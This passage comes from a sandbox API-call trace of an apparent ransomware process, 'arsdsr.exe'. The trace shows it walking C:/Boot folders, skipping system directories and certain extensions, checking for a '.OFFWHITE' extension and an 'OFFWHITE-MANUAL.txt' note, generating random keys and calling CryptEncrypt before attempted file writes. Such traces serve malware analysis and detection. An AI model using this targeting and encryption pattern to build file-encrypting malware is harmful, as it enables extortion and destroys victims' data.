Size=0x8) returned 0x52bdb0 [0082.244] CreateFileW (lpFileName="C:/Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.245] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.245] GetProcessHeap () returned 0x500000 [0082.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a948 [0082.245] GetProcessHeap () returned 0x500000 [0082.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a960 [0082.245] GetProcessHeap () returned 0x500000 [0082.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5481b0 [0082.245] GetProcessHeap () returned 0x500000 [0082.245] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5482b8 [0082.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.245] SystemFunction036 (in: RandomBuffer=0x52a948, RandomBufferLength=0x10 | out: RandomBuffer=0x52a948) returned 1 [0082.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.245] SystemFunction036 (in: RandomBuffer=0x52a960, RandomBufferLength=0x10 | out: RandomBuffer=0x52a960) returned 1 [0082.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.245] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5481b0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5481b0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.245] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.245] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.246] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5482b8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5482b8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.246] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.246] SetLastError (dwErrCode=0x0) [0082.246] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5481b0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.246] GetLastError () returned 0x6 [0082.246] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0082.246] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.246] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="es-ES", cAlternateFileName="")) returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2=".") returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="..") returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="...") returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="windows") returned -1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="$recycle.bin") returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="rsa") returned -1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="ntuser.dat") returned -1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="programdata") returned -1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="appdata") returned 1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="program files") returned -1 [0082.246] lstrcmpiW (lpString1="es-ES", lpString2="program files (x86)") returned -1 [0082.247] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.247] lstrcatW (in: lpString1="C:/Boot\\", lpString2="es-ES" | out: lpString1="C:/Boot\\es-ES") returned="C:/Boot\\es-ES" [0082.247] lstrcatW (in: lpString1="C:/Boot\\es-ES", lpString2="\\" | out: lpString1="C:/Boot\\es-ES\\") returned="C:/Boot\\es-ES\\" [0082.247] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\es-ES\\" | out: lpString1="C:/Boot\\es-ES\\") returned="C:/Boot\\es-ES\\" [0082.247] lstrcatW (in: lpString1="C:/Boot\\es-ES\\", lpString2="*.*" | out: lpString1="C:/Boot\\es-ES\\*.*") returned="C:/Boot\\es-ES\\*.*" [0082.247] FindFirstFileW (in: lpFileName="C:/Boot\\es-ES\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.249] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.249] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.249] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.249] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.249] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.249] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.250] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.250] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\es-ES\\" | out: lpString1="C:/Boot\\es-ES\\") returned="C:/Boot\\es-ES\\" [0082.250] lstrcatW (in: lpString1="C:/Boot\\es-ES\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\es-ES\\bootmgr.exe.mui") returned="C:/Boot\\es-ES\\bootmgr.exe.mui" [0082.250] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.250] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.250] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.250] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.250] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.250] GetProcessHeap () returned 0x500000 [0082.250] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd90 [0082.250] CreateFileW (lpFileName="C:/Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.251] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.251] GetProcessHeap () returned 0x500000 [0082.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a7e0 [0082.251] GetProcessHeap () returned 0x500000 [0082.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a7f8 [0082.251] GetProcessHeap () returned 0x500000 [0082.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5487e8 [0082.251] GetProcessHeap () returned 0x500000 [0082.251] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5488f0 [0082.251] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.251] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.251] SystemFunction036 (in: RandomBuffer=0x52a7e0, RandomBufferLength=0x10 | out: RandomBuffer=0x52a7e0) returned 1 [0082.251] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.251] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.251] SystemFunction036 (in: RandomBuffer=0x52a7f8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a7f8) returned 1 [0082.252] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.252] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.252] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5487e8*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x5487e8*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.252] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.252] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.252] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5488f0*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x5488f0*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.252] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.252] SetLastError (dwErrCode=0x0) [0082.252] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5487e8, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.252] GetLastError () returned 0x6 [0082.252] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.252] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.256] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2=".") returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="..") returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="...") returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="windows") returned -1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="$recycle.bin") returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="rsa") returned -1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="ntuser.dat") returned -1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="programdata") returned -1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="appdata") returned 1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="program files") returned -1 [0082.256] lstrcmpiW (lpString1="fi-FI", lpString2="program files (x86)") returned -1 [0082.256] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.256] lstrcatW (in: lpString1="C:/Boot\\", lpString2="fi-FI" | out: lpString1="C:/Boot\\fi-FI") returned="C:/Boot\\fi-FI" [0082.256] lstrcatW (in: lpString1="C:/Boot\\fi-FI", lpString2="\\" | out: lpString1="C:/Boot\\fi-FI\\") returned="C:/Boot\\fi-FI\\" [0082.256] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\fi-FI\\" | out: lpString1="C:/Boot\\fi-FI\\") returned="C:/Boot\\fi-FI\\" [0082.256] lstrcatW (in: lpString1="C:/Boot\\fi-FI\\", lpString2="*.*" | out: lpString1="C:/Boot\\fi-FI\\*.*") returned="C:/Boot\\fi-FI\\*.*" [0082.256] FindFirstFileW (in: lpFileName="C:/Boot\\fi-FI\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.257] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.257] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.257] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.257] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.258] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\fi-FI\\" | out: lpString1="C:/Boot\\fi-FI\\") returned="C:/Boot\\fi-FI\\" [0082.258] lstrcatW (in: lpString1="C:/Boot\\fi-FI\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\fi-FI\\bootmgr.exe.mui") returned="C:/Boot\\fi-FI\\bootmgr.exe.mui" [0082.258] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.258] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.258] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.258] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.258] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.258] GetProcessHeap () returned 0x500000 [0082.258] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bc30 [0082.258] CreateFileW (lpFileName="C:/Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.259] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.259] GetProcessHeap () returned 0x500000 [0082.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a810 [0082.259] GetProcessHeap () returned 0x500000 [0082.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a828 [0082.259] GetProcessHeap () returned 0x500000 [0082.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x51fee0 [0082.259] GetProcessHeap () returned 0x500000 [0082.259] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x51ffe8 [0082.259] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.259] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.259] SystemFunction036 (in: RandomBuffer=0x52a810, RandomBufferLength=0x10 | out: RandomBuffer=0x52a810) returned 1 [0082.259] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.259] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.259] SystemFunction036 (in: RandomBuffer=0x52a828, RandomBufferLength=0x10 | out: RandomBuffer=0x52a828) returned 1 [0082.259] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.259] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.259] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51fee0*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x51fee0*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.259] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.259] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.260] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x51ffe8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x51ffe8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.260] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.260] SetLastError (dwErrCode=0x0) [0082.260] WriteFile (in: hFile=0xffffffff, lpBuffer=0x51fee0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.260] GetLastError () returned 0x6 [0082.260] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.260] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.260] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="Fonts", cAlternateFileName="")) returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2=".") returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="..") returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="...") returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="windows") returned -1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="$recycle.bin") returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="rsa") returned -1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="ntuser.dat") returned -1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="programdata") returned -1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="appdata") returned 1 [0082.260] lstrcmpiW (lpString1="Fonts", lpString2="program files") returned -1 [0082.261] lstrcmpiW (lpString1="Fonts", lpString2="program files (x86)") returned -1 [0082.261] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.261] lstrcatW (in: lpString1="C:/Boot\\", lpString2="Fonts" | out: lpString1="C:/Boot\\Fonts") returned="C:/Boot\\Fonts" [0082.261] lstrcatW (in: lpString1="C:/Boot\\Fonts", lpString2="\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.261] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\Fonts\\" | out: lpString1="C:/Boot\\Fonts\\") returned="C:/Boot\\Fonts\\" [0082.261] lstrcatW (in: lpString1="C:/Boot\\Fonts\\", lpString2="*.*" | out: lpString1="C:/Boot\\Fonts\\*.*") returned="C:/Boot\\Fonts\\*.*" [0082.261] FindFirstFileW (in: lpFileName="C:/Boot\\Fonts\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, 